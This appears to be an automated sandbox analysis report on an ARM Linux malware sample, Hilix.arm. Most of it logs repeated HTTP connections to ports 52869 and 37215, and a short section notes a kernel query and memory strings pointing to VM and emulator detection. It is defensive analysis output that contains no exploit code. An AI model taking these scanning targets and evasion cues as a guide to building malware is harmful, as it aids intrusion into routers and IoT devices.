Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44220 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42792 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46480 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46486 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37898 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37900 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36894 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57992 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42006 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55814 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33852 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60430 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60440 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60432 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60422
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60432
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40946 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53954
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53958
Source: unknown	Network traffic detected: HTTP traffic on port 36600 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58694 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33618 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33626 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35668 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44216 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45072 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34222 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34680 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42850 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown	Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown	Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/Hilix.arm (PID: 5244)

Queries kernel information via 'uname':

Jump to behavior

Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
